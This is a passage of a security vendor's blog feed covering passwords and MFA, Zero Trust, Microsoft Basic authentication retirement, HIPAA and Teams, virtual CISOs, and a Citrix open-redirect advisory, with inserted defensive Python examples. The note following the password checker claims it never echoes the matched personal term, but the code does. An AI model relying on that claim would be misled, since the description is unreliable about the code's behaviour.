  • Finally, whenever possible, use multi-factor authentication (MFA). MFA makes it considerably more difficult for attackers to gain unauthorized access to an account, even when they have access to an account password. MFA can help defend against phishing, keyloggers and malware attacks by requiring the attacker to steal or replicate a second factor (e.g., a phone) to pass the MFA check. Security in layers is a best practice, and while not foolproof, MFA provides an additional layer of security that can significantly reduce the risk of unauthorized access to your accounts.
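The length, complexity and “no obvious details” guidance above can be enforced at account-creation time rather than left to the user. The following is an added example (not code from the original post or from OneNeck) of a server-side password check: it rejects short passwords, passwords on a blocklist of common choices, and passwords containing details an attacker could find through OSINT, and it estimates the keyspace in bits so the length-versus-complexity trade-off is visible. The blocklist, the personal terms and the guess rate used for the time estimate are constructed placeholders; a real deployment would check against a full breached-password list and the user’s actual profile data.

```python
"""Server-side password policy checks (added example)."""
import math
import re

# Constructed mini blocklist; the post names the first three as the most common.
COMMON_PASSWORDS = {"123456", "password", "guest", "qwerty", "letmein", "welcome"}


def charset_size(pw):
    """Size of the smallest standard character pool covering every character used."""
    size = 0
    if re.search(r"[a-z]", pw):
        size += 26
    if re.search(r"[A-Z]", pw):
        size += 26
    if re.search(r"[0-9]", pw):
        size += 10
    if re.search(r"[^A-Za-z0-9]", pw):
        size += 33  # printable ASCII symbols plus space
    return size


def estimated_bits(pw):
    """Keyspace in bits, assuming the password is uniformly random over its pool.
    This is an upper bound: a dictionary word uses far less of the pool."""
    return len(pw) * math.log2(charset_size(pw)) if pw else 0.0


def years_to_exhaust(pw, guesses_per_second=1e10):
    """Worst-case years to try the whole keyspace at an assumed (constructed) guess rate."""
    return 2 ** estimated_bits(pw) / guesses_per_second / (365 * 24 * 3600)


def check_password(pw, personal_terms=(), min_length=14):
    """Return a list of policy violations; an empty list means the password is acceptable.
    `personal_terms` holds user-specific strings (names, pets, years) that must not appear."""
    problems = []
    if len(pw) < min_length:
        problems.append(f"shorter than {min_length} characters")
    lowered = pw.lower()
    if lowered in COMMON_PASSWORDS:
        problems.append("appears in the common-password blocklist")
    for term in personal_terms:
        if len(term) >= 3 and term.lower() in lowered:
            problems.append(f"contains personal detail '{term}'")
    return problems


if __name__ == "__main__":
    for candidate in ("password", "Fluffy-Rex-1985-home", "T9$kq!Lm2@vX7#r"):
        print(candidate, check_password(candidate, personal_terms=["Fluffy", "1985"]),
              f"{estimated_bits(candidate):.1f} bits")
```

Note that the check never tells the user which blocklist entry or personal term matched beyond the generic message; echoing the matched secret back in an error is itself a leak in shared environments.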

OneNeck – A Security Partner You Can Trust

As an experienced IT security services provider, OneNeck is here to help. Our team can assess your current security posture, develop a defense strategy, and help you better leverage your existing security investments. Contact us today to speak with a OneNeck security professional.


Frequently asked questions…

What is the safest way to protect passwords?

The safest way to protect passwords is to use a strong, unique password for each account, and to store them securely using a password manager. A password manager encrypts and stores your passwords, making them accessible only with a master password or biometric authentication, and can generate strong, random passwords to help ensure maximum security.

What is a passphrase?

A passphrase is a series of words or other text used as a password or key to protect access to an account, device, or other resource. Passphrases are typically longer and more complex than traditional passwords, and can be easier to remember while also providing greater security against brute-force attacks.

Do security experts recommend password managers?

Yes, many security experts recommend using password managers as a secure way to manage passwords. Password managers can generate strong, unique passwords for each account, store them securely, and automatically fill them in for you, reducing the risk of password reuse, weak passwords, and other security issues. However, it’s important to choose a reputable password manager and follow best practices for password security, such as using multi-factor authentication and regularly changing passwords.

What is the difference between 2FA and MFA?

2FA stands for “two-factor authentication,” which requires users to provide two forms of authentication to access a resource, typically a username/password combination and a one-time code sent via SMS or generated by an app. MFA, or “multi-factor authentication,” is a more advanced form of 2FA that requires additional forms of authentication, such as a fingerprint or facial recognition, in addition to the traditional username/password and one-time code.

 

Protect Your IT With Strong Cybersecurity Practices https://www.oneneck.com/blog/protect-your-it-with-strong-cybersecurity-practices Wed, 07 Dec 2022 18:12:29 +0000

The end of the year is a time when businesses are wrapping things up. This sense of closure, coupled with the fact that people are taking time off, brings everyone’s guard down. While letting your guard down may be good for your family, it’s not the best idea when it comes to cybersecurity. 

Cybercriminals are savvy and look for opportune times to conduct their attacks. They know the holiday season is a great time to take advantage of people’s generosity and goodwill. The best defense for your business is to understand the tactics bad actors use to infiltrate IT security. To that end, we’ll consider seven best practices to protect your organization as the end of the year rolls around. 

7 Best Practices to Help Secure Your IT Infrastructure

1. Install software updates and patches promptly.

Security patches are created in response to emerging threats and are usually released because the threat is deemed too serious to wait for the next major software update. Installing patches as they become available helps businesses mitigate risk by ensuring known vulnerabilities remain exposed for as short a time as possible. Additionally, having policies to keep up with updates when employees are out of the office and during downtime (especially at the end of the year) helps keep your business systems running smoothly.

2. Use strong passwords and change them regularly.

It’s estimated that 81% of data breaches happen because of poor passwords. A seemingly small change can make a huge difference in your organization’s security. The end of the year is a great time to prompt employees to change their passwords. When doing so, encourage them to use 16 characters or more, as this strengthens password security.

3. Restrict access to sensitive data to authorized users only.

By restricting access to what’s strictly necessary, companies can reduce the risk of unauthorized users accessing and compromising that data. When attacks are likely, such as during the holiday season, reviewing your access policies helps ensure there are fewer people who can possibly mishandle sensitive data. Another reason is compliance. Many regulatory bodies require companies to restrict access to sensitive data in order to meet compliance requirements.

4. Educate employees on cybersecurity best practices.

Education is one of the best ways to defend against potential security risks. Training should be relevant to employee jobs to keep them engaged; the less generic, the more likely they are to heed the warnings. Training can include topics like the dangers of clicking on links, opening attachments from unknown sources, using strong passwords, and keeping their personal devices updated. Why not schedule training right before security is on high alert and send out a refresher when employees are more likely to let their guard down? 

5. Protect against phishing scams and malware attacks

[Image: a person reading a message that is obviously a scam. Caption: Train employees to recognize warning signs of a scam.]

New phishing scams and malware attacks arrive daily, so there’s no way you can train on the specifics. But you can help your employees practice good cyber vigilance and recognize the signs. For example, they should be aware of the red flags of a scam email or phishing call, such as poor grammar or requests for personal information from people they don’t know. They should also be cautious about approving application authorization requests if they don’t know exactly who is requesting them. Tips like these could be included in the cybersecurity refresher we recommend sending out.

6. Use two-factor authentication whenever possible.

Two-factor authentication is a cybersecurity best practice that requires employees to use two forms of identification to log in to their accounts. So even if a password becomes compromised, the hacker still needs a second authentication. In fact, a 2019 Microsoft report found that two-factor authentication blocked 99.9% of automated attacks.

7. Have a plan in place for dealing with a cybersecurity incident.

Whatever your efforts, no security plan is impenetrable. And a cybersecurity incident can have many negative consequences for an organization, including loss of data, decreased productivity, and financial damage. Having a plan in place will help you mitigate the effects in case of an incident. This plan should include steps for preventing and responding to incidents, as well as procedures for communicating with stakeholders.

Don’t Stress. Take the Proactive Approach Instead

At the end of the year, security isn’t always top of mind. By educating your organization on how to work securely, you mitigate many of the dangers hackers use during the holiday season.  

It’s also possible you’re looking for a partner to help fortify your security practices or provide needed security leadership. If that sounds like you, visit our IT security services page to learn more about what we offer. We’re here to help! 

Stay safe out there, and happy holidays! 


Frequently asked questions…

Why is patch management important?

Patch management is important because it helps to ensure that software and systems remain up-to-date and secure. By regularly applying patches, organizations can fix vulnerabilities and reduce the risk of cyberattacks or other security breaches. Additionally, patch management can help to improve system performance and reliability.

What is incident response in cybersecurity?

Incident response is the process of identifying, investigating, containing, and recovering from security incidents in order to mitigate the impact of a cybersecurity breach or attack. The goal is to minimize the damage caused by the incident, prevent it from spreading, and restore normal operations as quickly as possible.

What types of passwords are hardest to crack?

A long mix of upper- and lowercase letters, symbols and numbers is the best way to make your password more secure. The safest way to protect passwords is to use a strong, unique password for each account and to store them securely. Security experts recommend using passwords of at least 14 characters.

 

How to Get Board-Level Buy-In for Cybersecurity Awareness https://www.oneneck.com/blog/how-to-get-board-level-buy-in-for-cybersecurity-awareness-campaigns/ Tue, 18 Oct 2022 16:15:50 +0000

It’s October, which everyone knows means time for trick-or-treating, pumpkin-spiced everything and cybersecurity awareness. Ok, possibly you didn’t immediately think of that last part. However, October is Cybersecurity Awareness month and with it comes the announcement from the Cybersecurity and Infrastructure Security Agency (CISA) and the National Cybersecurity Alliance (NCA) that this year’s theme is “See Yourself in Cyber.” The goal is to highlight that whether one works in network security or is exclusively an end user, everyone has a role to play in strengthening cybersecurity.

After years of highly publicized ransomware attacks and expensive data breaches, it has become clear that organizations must allocate considerable resources for cybersecurity. This emphasis is necessary to protect company data, promote customer trust, and maintain compliance with the government and other regulatory agencies. Investment in secure and resilient infrastructure and applications such as next-generation firewalls, advanced backup and disaster recovery solutions, and utilizing IaaS and SaaS continues to significantly increase. However, broader cybersecurity awareness campaigns have yet to obtain such ubiquitous adoption status.

While most organizations acknowledge the importance of cybersecurity mindfulness, investment in and commitment to cybersecurity awareness initiatives still lag significantly behind that stated recognition. This lack of prioritization, in many cases, originates at the Board of Directors (BOD) level. There are many reasons for potential BOD hesitancy to fully support cybersecurity campaigns, but some of the more common themes, and ways to address them, include:

  • Budgetary Concerns– All organizations have a limit to the resources designated for security. In many cases, it is often easier to convince board-level members to allocate these assets for infrastructure, applications or even additional staffing. Garnering support to assign these resources to less-tangible elements, such as security awareness training, is often challenging. Bringing to the BOD assessments that demonstrate how security training aids an organization while concurrently underscoring the costs of inaction can go a long way in convincing board members of the elevated ROI they will see from implementation.
  • Lack of Cybersecurity Understanding– Education is vital. Company leadership will not support or approve campaigns they do not understand. It is common for leadership to view cybersecurity as an “IT issue” and not something that involves the entire organization. To raise the levels of understanding, one must ensure board members themselves are involved in cybersecurity training and are aware of not only the benefits of proactive company-wide approaches to cybersecurity but simultaneously understand the financial and reputational ramifications of breaches or attacks.
  • Resistance to Change– Technology is evolving, and so are the threats. The modern workplace requires a modern approach where everyone is part of the solution. Ultimately individuals, including board members, don’t like change and often want to continue doing things as they have always been. A prospective way to combat this inertia is by increasing board member involvement in planning cybersecurity activities and training. When you have full board-level support for a cybersecurity awareness initiative, all employees and team members will eventually be able to “see themselves in cybersecurity” and recognize that compliance with training exercises or policies is a core component of their profession.

When asked about obtaining board-level support for cybersecurity awareness campaigns, Katie McCullough, Chief Information Security Officer at OneNeck, advised, “At its core, cybersecurity is about assessing, managing or removing risk to the availability of customer’s critical data and services. By ensuring cybersecurity is included as part of any Enterprise Risk Management (ERM), one can typically help drive the awareness and support of these campaigns through scheduled reviews of the ERM, by the Board of Directors.”

Before bringing cybersecurity campaign concepts to the BOD’s attention, it is imperative to clarify why organization-wide cybersecurity awareness matters. Begin by stressing that critical concepts such as data protection and a holistically solid security posture are, at their core, intelligent business decisions. Follow this by emphasizing that awareness training provides significant ROI, with the expense of designing and implementing awareness campaigns greatly overshadowed by the cost of a breach. Finally, it is wise to highlight that the short-term inconvenience of awareness training will translate into significant long-term gains. Ultimately, the goal is to work with your BOD to answer questions and provide information so they feel comfortable making informed decisions.

Another point to underscore to board members is that they are accountable for the organization’s cybersecurity. We see an extreme example of this accountability in the well-publicized breach of SolarWinds. In November of 2021, investors sued the BOD, claiming the board knew of cybersecurity vulnerabilities before the data breach and failed to act.

While a lawsuit may not be the most likely outcome of a cyberattack, it nonetheless serves as a stark reminder to board members that they are ultimately responsible for how organizations secure themselves. Having proactive board-level conversations about cybersecurity awareness helps protect the organization’s customers, profits, reputation and the Boards of Directors themselves.

Encouraging professional education for board members is another technique for getting board-level buy-in. Katie McCullough notes, “More and more companies are looking for Board of Directors to consider certifications such as NACD Certification program, which includes a certification for Cyber-Risk Oversight as an emerging area of board oversight.”  Board members can use training resources to:

  • Learn foundational principles for board-level cyber-risk oversight.
  • Increase comprehension of issues, including allocating cybersecurity responsibilities, legal implications, setting expectations about the organization’s cybersecurity processes and ways to improve employee engagement in security practices.
  • Gain the ability to apply procedures and tools to improve organizational practices by focusing on specific risk components, including insider threats, third-party exposures, merger and acquisition due diligence, and adequate risk disclosure.

Board of Director buy-in is key to any organization having an effective cybersecurity awareness culture. For everyone in an organization to “see yourself in cyber,” the impetus must come from the top. Implementations of awareness campaigns, whether specifically designed to coincide with Cybersecurity Awareness Month or throughout the year, will only be effective if they are supported and promoted by company leadership.

While we have discussed several strategies and potential tools that can be used to secure top-level support, the essential thing to remember when dealing with board members is that despite their lofty positions, they are ultimately still just people. Effective communication, proper education and comprehensive information on the organization-wide benefits of cybersecurity awareness campaigns will go a long way in securing board-level support and approval.

Zero Trust is effective – what else is needed for security? https://www.oneneck.com/blog/zero-trust-is-really-effective-but-what-else-do-you-need-for-a-holistic-security-strategy/ Thu, 06 Oct 2022 15:58:12 +0000

In my last blog on Zero Trust (on June 6 of this year), I talked about why Zero Trust is becoming more popular and why the change is necessary. In this blog, I want to delve into what a Zero Trust model buys you and what you still need to do in your security program alongside it.

At its core, Zero Trust is the decision that every access to applications, data and resources is checked and strongly verified, continuously rather than once at login. This helps your organization in several ways.

Zero Trust provides a mechanism for strong identity protection. Protecting identities (both standard and privileged) has become one of the main focuses of security, and more and more security tools and business processes home in on how identities are being used and what access they should have.

This matters because of how dispersed applications and data now are. As security operations teams try to baseline access, it becomes critically important to know the context of each login: which identity, from where, and on what device.

One of the goals of Zero Trust should be to limit the number of people or identities that can access your systems, data and applications, which makes it possible to watch for compromised-account activity and stop it. Strong authentication and just-in-time access, combined with monitoring of login activity, greatly reduce the chance of account compromise. This also makes life simpler operationally and, potentially, in application development.

Once you have a single access method, a consolidated identity with strong authentication, and a baseline of login activity, you can expose resources internally the same way you expose them externally. Internal applications and resources can then feel like cloud applications when it comes to employee access: the login method can be the same and the security can be the same. This innately helps with identity protection and opens up new options for remote-worker access.

It also increases visibility for security operations staff, who now have fewer things to monitor and alert on. They can develop access policies that apply to more applications, data and infrastructure because the access method has been simplified, and reacting to compromised-account indicators is faster because logins have been baselined.
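What “baselining logins” looks like in practice, as an added example that is not part of the original post or any vendor’s product: the script below learns each identity’s normal context (countries, devices, applications) from known-good sign-ins and scores new sign-ins by how far they depart from it. The sign-in records are constructed inline, and the field names (user, country, device, app, mfa) are an assumption about what an identity provider’s sign-in log exports.

```python
"""Baseline sign-in context per identity and flag sign-ins that deviate.

Added example for this post, not code from OneNeck or any identity
provider. Records are constructed inline; the field names are assumptions
about what a sign-in log exports.
"""
from collections import defaultdict
from dataclasses import dataclass, field


@dataclass
class Baseline:
    countries: set = field(default_factory=set)
    devices: set = field(default_factory=set)
    apps: set = field(default_factory=set)


# Constructed history: known-good sign-ins used to learn each identity's context.
HISTORY = [
    {"user": "alice", "country": "US", "device": "lt-alice-01", "app": "M365", "mfa": True},
    {"user": "alice", "country": "US", "device": "lt-alice-01", "app": "ERP", "mfa": True},
    {"user": "alice", "country": "US", "device": "ph-alice-01", "app": "M365", "mfa": True},
    {"user": "bob", "country": "DE", "device": "lt-bob-01", "app": "M365", "mfa": True},
    {"user": "bob", "country": "DE", "device": "ph-bob-01", "app": "M365", "mfa": True},
]

# Constructed new sign-ins to evaluate against the baseline.
NEW = [
    {"user": "alice", "country": "US", "device": "lt-alice-01", "app": "M365", "mfa": True},
    {"user": "alice", "country": "RO", "device": "unknown-7f3a", "app": "M365", "mfa": False},
    {"user": "bob", "country": "DE", "device": "ph-bob-01", "app": "ERP", "mfa": True},
    {"user": "carol", "country": "US", "device": "lt-carol-01", "app": "M365", "mfa": True},
]


def build_baseline(records):
    """Collect the countries, devices and apps each identity has legitimately used."""
    baselines = defaultdict(Baseline)
    for r in records:
        b = baselines[r["user"]]
        b.countries.add(r["country"])
        b.devices.add(r["device"])
        b.apps.add(r["app"])
    return dict(baselines)


def score_signin(record, baselines):
    """Return the reasons this sign-in departs from its identity's baseline (empty = consistent)."""
    b = baselines.get(record["user"])
    if b is None:
        return ["unknown identity"]
    reasons = []
    if record["country"] not in b.countries:
        reasons.append("new country")
    if record["device"] not in b.devices:
        reasons.append("unregistered device")
    if record["app"] not in b.apps:
        reasons.append("new application")
    if not record["mfa"]:
        reasons.append("no MFA")
    return reasons


def triage(records, baselines, threshold=2):
    """Sign-ins worth an analyst's attention: unknown identities, or >= threshold deviations."""
    flagged = []
    for r in records:
        reasons = score_signin(r, baselines)
        if "unknown identity" in reasons or len(reasons) >= threshold:
            flagged.append((r["user"], reasons))
    return flagged


if __name__ == "__main__":
    base = build_baseline(HISTORY)
    for user, reasons in triage(NEW, base):
        print(f"{user}: {', '.join(reasons)}")
```

In a Zero Trust deployment the identity provider’s policy engine makes this decision at access time; the scoring above is the same logic a security operations team runs over exported sign-in logs to spot the compromised-account indicators the post describes (a new country plus an unregistered device plus no MFA on one sign-in is the combination to page on).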

Additionally, the number of security tools may go down because access has been simplified. This is in contrast to the older security model, where access could vary wildly depending on the endpoint’s network location and the identity used.

What do you need beyond Zero Trust?

There are things that still need to be done beyond Zero Trust. While Zero Trust does help in many ways, it does not cover all aspects of what an effective security program still requires.

  • Organizations still need to have strong policies and standards.
  • They need to have a working vulnerability program that covers as many assets as possible.
  • Remediation for found vulnerabilities needs to happen in a timely manner.
  • Data protection has to be carefully planned and documented, so that you can recover if someone or something compromises the integrity of the data.
  • Business continuity plans need to be in place and rehearsed.
  • Endpoint security must work with your Zero Trust strategy.
  • Security operations has to be built or outsourced to provide a response to security indicators.
  • Tools have to be in place to take in those indicators and provide alerts.

In summary…

This is a high-level view of the benefits of Zero Trust and the other aspects of security that must coexist alongside that architecture for an effective security strategy. In my next post, I will go into more detail on the components of Zero Trust and what to consider when planning and implementing it in your organization.

In the meantime, if you’re considering Zero Trust in your environment and want to discuss it, just contact us, and one of our security experts will help.

Cisco UC and the End of Microsoft Basic Authentication
https://www.oneneck.com/blog/cisco-unity-connection-and-the-end-of-microsoft-basic-authentication/ (Wed, 28 Sep 2022 15:44:21 +0000)

For the past two years, Microsoft has been winding down support for Basic authentication in its Exchange services, and in September Microsoft announced the change to the authentication methods Exchange Online supports. As a result, Cisco Unity Connection integrations with Exchange Online (M365) for Unified Messaging will be affected.

Traditionally, applications have connected to servers, services and API endpoints by sending a username and password with every request. Basic authentication is often enabled by default because it is simple to set up. However, the credentials travel with every request only Base64-encoded, so they can be captured or guessed by password spraying, and Basic authentication cannot enforce multi-factor authentication. It is now considered an outdated method that is increasingly exposed to attack.

End of Microsoft Basic Authentication

On October 1, 2022, Microsoft begins turning off Basic authentication in Exchange Online; from then on, only applications using OAuth-based (Modern) authentication are supported. How does this affect those who use Cisco Unity Connection? Simply put, for any users of Cisco Unity Connection 11.5(1) SU7, 12.5(1) SU1 and all older releases, Unified Messaging with Microsoft 365 will stop working once Basic authentication is disabled.

Cisco Unity Connection Must Use OAuth-based Authentication

Cisco has stated that releases 11.5(1) SU8 / 12.5(1) SU2 and all newer versions of Cisco Unity Connection support both OAuth-based and Basic authentication for Microsoft 365:

Microsoft will support both types of authentications until the complete deprecation of Basic authentication. Upon completion of this changeover, users must exclusively utilize OAuth-based authentication.

Therefore, any customer currently on an earlier version of Cisco Unity Connection will need to upgrade their deployment if they wish to continue using Unified Messaging with M365. After the upgrade, according to Cisco, administrators select the authentication method on the Unified Messaging Service Configuration page in Cisco Unity Connection Administration.

Need More Time? What Can You Do?

For any organization that still needs to upgrade Unity Connection but needs more time, Microsoft has announced an opportunity to postpone the change. Customers can use its self-service diagnostics to re-enable Basic authentication for the protocols they need, once per protocol.

This postponement is available between October 1 and December 31, 2022. It is critical to note, however, that any re-enabled protocols will be turned off again during the first week of January 2023, with no further exceptions.

OneNeck, We’ve Got Your Back

If you have any questions or are unsure whether your Cisco Unity Connection is ready for OAuth-based authentication, we’re here to help. Talk to one of our experienced team members today, and ensure your Cisco Unity Connection is future-ready.

Is Microsoft Teams HIPAA Compliant?
https://www.oneneck.com/blog/is-microsoft-teams-hipaa-compliant (Wed, 21 Sep 2022 17:46:34 +0000)

OneNeck customers who handle electronic protected health information (ePHI) often ask: is Microsoft Teams HIPAA compliant? These customers use M365 and Teams within their organizations and value the easy, effective collaboration they bring. Still, they are concerned about the implications of using these services when PHI is so critical to their business.

So, is Microsoft Teams HIPAA compliant?

Yes, but compliance is not automatic. There are steps every organization must take to establish and maintain it.

The safeguards of the HIPAA Security Rule for compliance are broken down into three main sections: technical, physical and administrative safeguards. For our purposes, we’ll primarily focus here on the necessary technical safeguards.

One of the most important technical HIPAA requirements is that ePHI be encrypted at rest and in transit (formally an “addressable” specification, but expected in practice), so that only authorized users can read the data and, in the event of a breach, the compromised data is indecipherable. Another crucial requirement is that every user with access to ePHI has a unique user identification so that their activity can be monitored. For devices, an automatic log-off feature is needed to prevent unauthorized access if a device is left unattended.

Microsoft Teams is developed with security at the forefront of its design and is well suited to meet HIPAA security requirements. Microsoft Teams has the following safeguards in place that assist in the securing of ePHI:

  • Access Controls provide users with login credentials that are unique to them, ensuring that PHI is only accessible to authorized users.
  • Single sign-on (SSO) enables users to secure access to related systems with one login credential (Microsoft Teams, M365, etc.).
  • Multi-Factor Authentication (MFA) requires a second factor beyond the password (an authenticator app, hardware key or biometric), so a stolen password alone is not enough to reach ePHI.
  • Audit Logs track access to ePHI to ensure observance of all the necessary standards.
  • Encryption transforms ePHI into a format only accessible via a decryption key, preventing unauthorized access to data at rest and in transit.

It is essential to note that while Microsoft Teams does include the necessary security features for HIPAA compliance, in many cases, the organization and its users must properly configure specific settings along with the implementation of companywide policies ensuring the safeguards above are followed. Ultimately, your organization’s policies, IT department and users must actively work together to ensure compliance is not only initially attained but constantly maintained.

BAA (Business Associate Agreement)

Per HIPAA 45 CFR 164.504(e), a business associate agreement (BAA) is required with any organization that will process PHI on a covered entity’s behalf. The agreement sets out the required security controls, the responsibilities of the parties and how PHI may be used. Even with all the necessary security policies and controls enabled in Microsoft Teams, use of Teams for PHI is not HIPAA compliant until a signed BAA is in place.

Fundamental aspects of a HIPAA BAA include:

  • A description of how business associates are permitted and required to use PHI.
  • A requirement that PHI only is used or disclosed as contracted or required by law.
  • Business associates must utilize applicable security measures to ensure PHI is used in agreement with all contract terms.
  • Requires reasonable steps be taken to resolve any breach as soon as one is detected.

Fortunately, Microsoft states on its website that it will sign a BAA with organizations using Microsoft Teams for PHI. Note the accompanying disclaimer: the customer is responsible for configuring Microsoft Teams for HIPAA compliance. Once the BAA is signed, an organization can process and store ePHI in Microsoft Teams. One more point to check: even if an organization already has a signed BAA with Microsoft for M365 or other services, confirm that Microsoft Teams is covered by it; if not, an additional BAA covering Teams is required.

Organizational Responsibility for Maintaining Teams Compliance

Even with Microsoft Teams’ built-in security controls and a signed BAA, every organization must understand that they ultimately bear the responsibility of ensuring their use of Microsoft Teams is HIPAA compliant. Organizations must place a priority on practicing the appropriate security hygiene necessary to minimize security risks.

To remain HIPAA compliant, your organization must make the security and safety of PHI paramount. This requires top-down buy-in from the entire organization. Not only must HIPAA policies and procedures be established, but appropriate security awareness training must be routinely conducted, so everyone involved understands these best practices.

Ultimately, Microsoft Teams can meet the technical safeguards and legal agreements HIPAA compliance requires. Nonetheless, whatever tools are used, maintaining compliance relies on your organization and its ability to establish and enforce HIPAA policies and procedures.

Add Security Leadership with a Virtual CISO
https://www.oneneck.com/blog/add-security-leadership-to-your-organization-with-a-virtual-ciso/ (Mon, 19 Sep 2022 21:05:49 +0000)

Small businesses are the backbone of the American economy, yet they are often neglected when it comes to information security. While large businesses can afford to hire a chief information security officer (CISO) full-time, small businesses often cannot, leaving them vulnerable to data breaches and other cyberattacks.

However, there is a solution: hiring a virtual CISO (vCISO). A vCISO is a professional who provides information security leadership to an organization remotely. They are typically part-time and work with the business owner to advise on the business’s security. Is a virtual CISO right for you? In this article, we’ll look at the benefits of hiring a virtual CISO, their limitations, and what to look for when hiring.

Why Consider Hiring a Virtual CISO

Ideally, every company would have experienced in-house information security leadership. However, even when a business has the budget, talent can be hard to come by. Virtual CISOs are a great solution to budget and talent concerns. They typically cost less than half of what a full-time CISO costs and are available when you need them.

That said, it’s important to understand what a virtual CISO brings to the table. Virtual CISOs serve as advisors that can help you develop and implement a security plan that meets your business needs. You can often find someone who has experience in your specific industry and can take into account regulatory standards like HIPAA.

Virtual CISOs also focus on bringing the right people on board and designing processes that keep your business secure. While an engineer can help you with the tactical implementation of your security program, people and processes are key to protecting data long-term. This focus is the sweet spot for CISOs.

The Limitations of a Virtual CISO

Since they are not a permanent member of the team, virtual CISOs serve as advisors rather than project owners. Therefore, a vCISO does not have the same level of authority as a full-time CISO. This difference can lead to communication issues between the virtual CISO and other team members.

Another difference between a virtual and full-time CISO is that your team will ultimately be responsible for the implementation and management of the budget. These limitations may cause problems for businesses with extensive attack surfaces or those who operate in heavily regulated industries. A final consideration is cost. While a vCISO is significantly cheaper than a full-time employee, the cost may still be too high for smaller firms to take on.

However, security is something businesses of all sizes need to take seriously. So, while the cost of information security leadership may seem steep, the cost of a data breach or legal action is much higher. That’s why many businesses bolster their security through CISO leadership. The key is analyzing your company’s needs and finding the right talent.

When hiring a virtual CISO, consider the individual’s experience and qualifications. The virtual CISO should have a deep understanding of information security in your industry. Such a CISO is more likely to be proactive and think outside the box when creating solutions to novel security challenges.

A vCISO should also be able to communicate effectively with employees at all levels of the organization. Since the virtual CISO will be working with your team closely in a leadership role, they must be able to build relationships and establish trust. Hence, a virtual CISO should be a good fit for your company culture.

Ultimately, hiring a virtual CISO is an important decision that can help protect your business’s data and reputation. But finding the right person can be an intimidating task. Our team at OneNeck can help you analyze your security needs and advise you on the best options available to you. Contact us to learn more.

Ten questions to ask before hiring a vCISO:

  1. What is your company’s budget?
  2. What are your company’s security goals?
  3. What is your company’s current security posture?
  4. What are your company’s compliance requirements?
  5. What is your company’s threat landscape?
  6. What experience does your vCISO need to have?
  7. What availability do you need from your vCISO?
  8. What services are necessities, and which are nice to have?
  9. What rates and pricing model are you comfortable with?
  10. How will you work with your vCISO?

Citrix ADC and Citrix Gateway Security Vulnerability
https://www.oneneck.com/blog/citrix-adc-and-citrix-gateway-security-vulnerability/ (Mon, 15 Aug 2022 20:20:19 +0000)

Citrix has disclosed a vulnerability in Citrix ADC (formerly NetScaler) and Citrix Gateway that lets an attacker craft a URL which redirects victims to a malicious website. Citrix and OneNeck strongly recommend that all customers using these Citrix products take note of this vulnerability and determine whether they are affected.

Vulnerability Description

The vulnerability (CVE-2022-27509, CWE-345) is an open redirect: an unauthorized redirection to a malicious website. Two pre-conditions determine exposure. First, the appliance must be configured as a VPN (Gateway) or AAA virtual server. Second, the targeted victim must follow an attacker-crafted link.

Affected Versions

According to Citrix, the following supported versions of Citrix ADC and Citrix Gateway are affected:

  • Citrix ADC and Citrix Gateway 13.1 before 13.1-24.38
  • Citrix ADC and Citrix Gateway 13.0 before 13.0-86.17
  • Citrix ADC and Citrix Gateway 12.1 before 12.1-65.15
  • Citrix ADC 12.1-FIPS before 12.1-55.282
  • Citrix ADC 12.1-NDcPP before 12.1-55.282

Note that organizations using Citrix-managed cloud services are not affected by this vulnerability and need take no action. Those with customer-managed ADC and Gateway appliances should take the following steps.

The Solution

Citrix recommends that customers running affected builds upgrade to the fixed versions of Citrix ADC or Citrix Gateway listed below.

Updated Versions:

  • Citrix ADC and Citrix Gateway 13.1-24.38 and later releases
  • Citrix ADC and Citrix Gateway 13.0-86.17 and later releases of 13.0
  • Citrix ADC and Citrix Gateway 12.1-65.15 and later releases of 12.1
  • Citrix ADC 12.1-FIPS 12.1-55.282 and later releases of 12.1-FIPS
  • Citrix ADC 12.1-NDcPP 12.1-55.282 and later releases of 12.1-NDcPP
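To turn the two tables above into a repeatable check across a fleet, here is an added example (not Citrix tooling and not part of the original post) that classifies a build string against the fixed builds listed. It accepts the advisory-style form (`13.0-86.17`) and, as an assumption about what the appliance’s `show ns version` command prints, the form `NetScaler NS13.0: Build 86.17.nc`. The caveat the tables hide: the FIPS and NDcPP trains share the 12.1 branch number but have a different fixed build (12.1-55.282, lower than the standard 12.1-65.15), so the caller has to state which train the appliance runs, and the advisory’s first precondition (a Gateway or AAA virtual server) is modeled as a flag.

```python
"""Classify a Citrix ADC / Citrix Gateway build against the CVE-2022-27509 fixed builds.

Added example, not Citrix's tooling. The fixed build numbers are those in
the advisory above. Parsing of `show ns version` output assumes the form
"NetScaler NS13.0: Build 86.17.nc" (an assumption); the advisory-style
form "13.0-86.17" is also accepted.
"""
import re
from typing import Tuple

# First fixed build per branch, as listed in the advisory.
FIXED = {
    "13.1": (24, 38),
    "13.0": (86, 17),
    "12.1": (65, 15),
    "12.1-FIPS": (55, 282),
    "12.1-NDcPP": (55, 282),
}

_SHOW_NS = re.compile(r"NS(\d+\.\d+):\s*Build\s+(\d+)\.(\d+)")   # assumed CLI format
_ADVISORY = re.compile(r"(\d+\.\d+)-(\d+)\.(\d+)")              # e.g. 13.0-86.17


def parse_build(version: str) -> Tuple[str, Tuple[int, int]]:
    """Return (branch, (build, minor)) from either accepted format."""
    m = _SHOW_NS.search(version) or _ADVISORY.fullmatch(version.strip())
    if not m:
        raise ValueError(f"unrecognised Citrix version string: {version!r}")
    return m.group(1), (int(m.group(2)), int(m.group(3)))


def classify(version: str, variant: str = "", gateway_or_aaa: bool = True) -> str:
    """Return 'vulnerable', 'fixed', 'unlisted' or 'not exposed'.

    variant: "" for the standard release, "FIPS" or "NDcPP" for those 12.1
    trains. The build string alone does not say which train it is, so the
    operator must supply it: 12.1-55.282 is fixed on FIPS/NDcPP, while the
    standard 12.1 fix is 12.1-65.15.
    gateway_or_aaa: False if the appliance runs no VPN (Gateway) or AAA
    virtual server, which is one of the advisory's preconditions.
    """
    branch, build = parse_build(version)
    if variant:
        branch = f"{branch}-{variant}"
    if branch not in FIXED:
        return "unlisted"        # branch not covered by the advisory (e.g. end of life)
    if not gateway_or_aaa:
        return "not exposed"     # precondition not met; still upgrade on the normal cycle
    return "fixed" if build >= FIXED[branch] else "vulnerable"


if __name__ == "__main__":
    # Constructed sample inventory: (version string, keyword arguments)
    inventory = [
        ("NetScaler NS13.0: Build 85.19.nc", {}),
        ("13.1-24.38", {}),
        ("12.1-55.282", {"variant": "FIPS"}),
        ("12.1-55.282", {}),
        ("13.0-85.19", {"gateway_or_aaa": False}),
    ]
    for v, kw in inventory:
        print(f"{v:40} {kw!s:30} -> {classify(v, **kw)}")
```

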